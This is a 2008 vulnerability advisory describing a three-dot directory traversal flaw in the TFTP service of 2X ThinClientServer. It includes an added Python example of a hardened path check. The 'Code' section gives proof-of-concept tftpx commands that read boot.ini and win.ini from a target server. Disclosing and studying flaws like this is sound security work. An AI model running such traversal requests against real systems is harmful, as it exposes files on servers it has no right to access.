#######################################################################
Luigi Auriemma
Application: 2X ThinClientServer
http://www.2x.com/thinclientserver/
Versions: <= v5.0_sp1-r3497
(TFTPd.exe <= 3.2.0.0)
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 29 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From the manual:
"2X ThinClientServer allows you to deploy a thin client OS to low-cost
thin client devices and existing PCs, and centrally manage settings and
configure to which terminal servers (Windows or Linux) a user should
log on to."
#######################################################################
======
2) Bug
======
The 2X TFTP Service enabled by default in ThinClientServer is affected
by a directory traversal vulnerability exploitable through the usage of
a sequence of 3 dots (instead of the classical two) for reaching the
various parent directories.
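A hardened filename check for a TFTP-style file server, added here as an illustration and not taken from 2X's code (the served root /srv/tftp is a placeholder). It contrasts a pattern filter that only rejects the literal ".." with a resolver that rejects every all-dot component and confirms the final path stays inside the root, which is what closes the three-dot variant described above:

```python
"""Constructed example: validating a requested TFTP filename against the
served root.  A filter for the literal ".." misses "...", so the hardened
resolver rejects any component made only of dots and then checks that the
normalised path is still under the root."""
import posixpath

ROOT = "/srv/tftp"   # assumed served directory (placeholder, not from 2X)


def naive_is_safe(requested: str) -> bool:
    """Weak check in the style of a vulnerable server: only the exact
    component ".." is refused, so ".../.../boot.ini" passes."""
    components = requested.replace("\\", "/").split("/")
    return ".." not in components


def resolve_tftp_path(root: str, requested: str):
    """Return the absolute path to serve, or None if the request must be
    refused.  Back- and forward slashes are treated alike, since a Windows
    server accepts both."""
    name = requested.replace("\\", "/")
    # Absolute paths and drive-letter paths are never valid TFTP requests.
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return None
    components = [c for c in name.split("/") if c]
    if not components:
        return None
    for c in components:
        # "..", "...", "...." and so on are never legitimate file names.
        # String normalisation below follows POSIX rules, which need not
        # match how the host file system interprets "...", so this explicit
        # rule is what actually catches the advisory's variant.
        if len(c) >= 2 and c.strip(".") == "":
            return None
    root = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root, *components))
    # Containment check: the result must be root/<something>, not root itself
    # and not a sibling such as /srv/tftp-other.
    if full == root or posixpath.commonpath([root, full]) != root:
        return None
    return full
```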
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
tftpx SERVER .../.../.../.../.../.../boot.ini none
tftpx SERVER ...\...\...\...\...\...\windows\win.ini none
#######################################################################
======
4) Fix
======
No fix
#######################################################################
---
Luigi Auriemma
http://aluigi.org